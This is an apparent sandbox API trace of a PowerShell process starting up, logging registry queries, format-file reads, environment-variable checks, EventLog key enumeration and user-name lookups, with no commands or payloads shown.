	[0477.959] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d05c, lpData=0x272150, lpcbData=0x16d058*=0x56 | out: lpType=0x16d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d058*=0x56) returned 0x0
	[0477.959] CoTaskMemFree (pv=0x272150) 
	[0477.959] RegCloseKey (hKey=0x338) returned 0x0
	[0477.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0477.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0477.959] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xfb64638a, Data2=0xc64b, Data3=0x4d30, Data4=([0]=0xb3, [1]=0xda, [2]=0x45, [3]=0x9e, [4]=0x3d, [5]=0x1e, [6]=0xfc, [7]=0xd9))) returned 0x0
	[0477.960] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x5659252e, Data2=0x9a13, Data3=0x4753, Data4=([0]=0xb6, [1]=0x67, [2]=0x6c, [3]=0xf, [4]=0xe2, [5]=0x8, [6]=0x24, [7]=0x15))) returned 0x0
	[0477.960] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0477.960] GetFileType (hFile=0x338) returned 0x1
	[0477.960] SetErrorMode (uMode=0x1) returned 0x1
	[0477.960] GetFileType (hFile=0x338) returned 0x1
	[0477.960] ReadFile (in: hFile=0x338, lpBuffer=0x31f33c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31f33c0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.961] ReadFile (in: hFile=0x338, lpBuffer=0x31f33c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31f33c0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.961] ReadFile (in: hFile=0x338, lpBuffer=0x31f33c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31f33c0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.962] ReadFile (in: hFile=0x338, lpBuffer=0x31f33c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31f33c0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.962] ReadFile (in: hFile=0x338, lpBuffer=0x31f33c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31f33c0*, lpNumberOfBytesRead=0x16d078*=0xe98, lpOverlapped=0x0) returned 1
	[0477.962] ReadFile (in: hFile=0x338, lpBuffer=0x31f29c0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31f29c0*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0477.962] ReadFile (in: hFile=0x338, lpBuffer=0x31f33c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31f33c0*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0477.962] CloseHandle (hObject=0x338) returned 1
	[0477.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0477.962] SetErrorMode (uMode=0x1) returned 0x1
	[0477.963] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d020 | out: lpFileInformation=0x16d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0477.963] SetErrorMode (uMode=0x1) returned 0x1
	[0477.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0477.963] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d108 | out: phkResult=0x16d108*=0x338) returned 0x0
	[0477.963] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d08c, lpData=0x0, lpcbData=0x16d088*=0x0 | out: lpType=0x16d08c*=0x1, lpData=0x0, lpcbData=0x16d088*=0x56) returned 0x0
	[0477.963] CoTaskMemAlloc (cb=0x5a) returned 0x272150
	[0477.963] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d05c, lpData=0x272150, lpcbData=0x16d058*=0x56 | out: lpType=0x16d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d058*=0x56) returned 0x0
	[0477.963] CoTaskMemFree (pv=0x272150) 
	[0477.963] RegCloseKey (hKey=0x338) returned 0x0
	[0477.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0477.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0477.964] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xb67337db, Data2=0x5c10, Data3=0x479c, Data4=([0]=0x87, [1]=0x3d, [2]=0x6f, [3]=0x6e, [4]=0xe8, [5]=0x4c, [6]=0xe5, [7]=0x35))) returned 0x0
	[0477.964] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x78de4bd, Data2=0x4a05, Data3=0x4056, Data4=([0]=0x8a, [1]=0x17, [2]=0xb5, [3]=0x2b, [4]=0x20, [5]=0xfd, [6]=0x94, [7]=0x53))) returned 0x0
	[0477.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0477.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0481.329] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0481.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.329] CoTaskMemFree (pv=0x252f10) 
	[0481.330] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0481.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.330] CoTaskMemFree (pv=0x252f10) 
	[0481.332] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0481.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.332] CoTaskMemFree (pv=0x252f10) 
	[0481.333] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0481.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.333] CoTaskMemFree (pv=0x252f10) 
	[0481.344] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0481.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.344] CoTaskMemFree (pv=0x252f10) 
	[0481.347] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0481.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.347] CoTaskMemFree (pv=0x252f10) 
	[0481.347] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0481.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.348] CoTaskMemFree (pv=0x252f10) 
	[0481.353] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d318 | out: phkResult=0x16d318*=0x338) returned 0x0
	[0481.356] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d21c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d218, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d21c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d218*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0482.190] CoTaskMemFree (pv=0x0) 
	[0482.191] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0482.191] RegEnumValueW (in: hKey=0x338, dwIndex=0x0, lpValueName=0x207ef0, lpcchValueName=0x16d2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0482.192] CoTaskMemFree (pv=0x207ef0) 
	[0482.192] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0482.192] RegEnumValueW (in: hKey=0x338, dwIndex=0x1, lpValueName=0x207ef0, lpcchValueName=0x16d2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0482.192] CoTaskMemFree (pv=0x207ef0) 
	[0482.192] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0482.192] RegEnumValueW (in: hKey=0x338, dwIndex=0x2, lpValueName=0x207ef0, lpcchValueName=0x16d2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0482.192] CoTaskMemFree (pv=0x207ef0) 
	[0482.193] RegQueryValueExW (in: hKey=0x338, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d2ac, lpData=0x0, lpcbData=0x16d2a8*=0x0 | out: lpType=0x16d2ac*=0x1, lpData=0x0, lpcbData=0x16d2a8*=0x8) returned 0x0
	[0482.193] CoTaskMemAlloc (cb=0xc) returned 0x1b80a1a0
	[0482.193] RegQueryValueExW (in: hKey=0x338, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d27c, lpData=0x1b80a1a0, lpcbData=0x16d278*=0x8 | out: lpType=0x16d27c*=0x1, lpData="2.0", lpcbData=0x16d278*=0x8) returned 0x0
	[0482.193] CoTaskMemFree (pv=0x1b80a1a0) 
	[0482.997] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d268 | out: phkResult=0x16d268*=0x314) returned 0x0
	[0482.997] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d16c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d168, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d16c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d168*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0482.997] CoTaskMemFree (pv=0x0) 
	[0482.997] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0482.997] RegEnumValueW (in: hKey=0x314, dwIndex=0x0, lpValueName=0x207ef0, lpcchValueName=0x16d218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0482.997] CoTaskMemFree (pv=0x207ef0) 
	[0482.997] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0482.997] RegEnumValueW (in: hKey=0x314, dwIndex=0x1, lpValueName=0x207ef0, lpcchValueName=0x16d218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0482.997] CoTaskMemFree (pv=0x207ef0) 
	[0482.997] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0482.997] RegEnumValueW (in: hKey=0x314, dwIndex=0x2, lpValueName=0x207ef0, lpcchValueName=0x16d218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0482.997] CoTaskMemFree (pv=0x207ef0) 
	[0482.998] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d1fc, lpData=0x0, lpcbData=0x16d1f8*=0x0 | out: lpType=0x16d1fc*=0x1, lpData=0x0, lpcbData=0x16d1f8*=0x8) returned 0x0
	[0482.998] CoTaskMemAlloc (cb=0xc) returned 0x1b80a1c0
	[0482.998] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d1cc, lpData=0x1b80a1c0, lpcbData=0x16d1c8*=0x8 | out: lpType=0x16d1cc*=0x1, lpData="2.0", lpcbData=0x16d1c8*=0x8) returned 0x0
	[0482.998] CoTaskMemFree (pv=0x1b80a1c0) 
	[0483.006] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0483.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0483.006] CoTaskMemFree (pv=0x252f10) 
	[0483.010] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0483.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0483.010] CoTaskMemFree (pv=0x252f10) 
	[0483.015] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d298 | out: phkResult=0x16d298*=0x314) returned 0x0
	[0483.016] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d20c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d208, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d20c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d208*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0483.016] CoTaskMemFree (pv=0x0) 
	[0483.017] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0483.017] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x0, lpName=0x207ef0, lpcchName=0x16d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0483.017] CoTaskMemFree (pv=0x207ef0) 
	[0483.017] CoTaskMemFree (pv=0x0) 
	[0483.017] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0483.017] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x1, lpName=0x207ef0, lpcchName=0x16d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0483.017] CoTaskMemFree (pv=0x207ef0) 
	[0483.017] CoTaskMemFree (pv=0x0) 
	[0483.017] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0483.017] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x2, lpName=0x207ef0, lpcchName=0x16d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0483.017] CoTaskMemFree (pv=0x207ef0) 
	[0483.017] CoTaskMemFree (pv=0x0) 
	[0483.017] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0483.017] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x3, lpName=0x207ef0, lpcchName=0x16d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0483.017] CoTaskMemFree (pv=0x207ef0) 
	[0483.017] CoTaskMemFree (pv=0x0) 
	[0483.017] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0483.017] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x4, lpName=0x207ef0, lpcchName=0x16d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0483.017] CoTaskMemFree (pv=0x207ef0) 
	[0483.017] CoTaskMemFree (pv=0x0) 
	[0483.017] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0483.017] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x5, lpName=0x207ef0, lpcchName=0x16d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0483.018] CoTaskMemFree (pv=0x207ef0) 
	[0483.018] CoTaskMemFree (pv=0x0) 
	[0483.018] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0483.018] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x6, lpName=0x207ef0, lpcchName=0x16d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0483.018] CoTaskMemFree (pv=0x207ef0) 
	[0483.018] CoTaskMemFree (pv=0x0) 
	[0483.018] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0483.018] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x7, lpName=0x207ef0, lpcchName=0x16d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0483.018] CoTaskMemFree (pv=0x207ef0) 
	[0483.018] CoTaskMemFree (pv=0x0) 
	[0483.018] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0483.018] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x8, lpName=0x207ef0, lpcchName=0x16d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0483.018] CoTaskMemFree (pv=0x207ef0) 
	[0483.018] CoTaskMemFree (pv=0x0) 
	[0483.018] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x338) returned 0x0
	[0483.018] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x0) returned 0x2
	[0483.019] RegOpenKeyExW (in: hKey=0x314, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x318) returned 0x0
	[0483.019] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x0) returned 0x2
	[0483.019] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x31c) returned 0x0
	[0483.019] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x0) returned 0x2
	[0483.019] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x330) returned 0x0
	[0483.019] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x0) returned 0x2
	[0483.019] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x1e0) returned 0x0
	[0483.019] RegOpenKeyExW (in: hKey=0x1e0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x0) returned 0x2
	[0483.020] RegOpenKeyExW (in: hKey=0x314, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x1dc) returned 0x0
	[0483.020] RegOpenKeyExW (in: hKey=0x1dc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x0) returned 0x2
	[0483.020] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x344) returned 0x0
	[0483.020] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x0) returned 0x2
	[0483.020] RegOpenKeyExW (in: hKey=0x314, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x348) returned 0x0
	[0483.020] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x0) returned 0x2
	[0483.020] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x34c) returned 0x0
	[0483.020] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2f8 | out: phkResult=0x16d2f8*=0x350) returned 0x0
	[0483.021] RegCloseKey (hKey=0x350) returned 0x0
	[0483.021] RegCloseKey (hKey=0x314) returned 0x0
	[0483.022] RegCloseKey (hKey=0x34c) returned 0x0
	[0483.036] CoTaskMemAlloc (cb=0x804) returned 0x1b81d430
	[0483.037] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d430, nSize=0x16d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d508) returned 0x1
	[0483.870] CoTaskMemFree (pv=0x1b81d430) 
	[0483.871] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0483.871] GetUserNameW (in: lpBuffer=0x207ef0, pcbBuffer=0x16d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d548) returned 1
	[0483.872] CoTaskMemFree (pv=0x207ef0) 
	[0484.607] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d248 | out: phkResult=0x16d248*=0x354) returned 0x0
	[0484.607] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d1bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d1b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d1bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d1b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.607] CoTaskMemFree (pv=0x0) 
	[0484.607] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
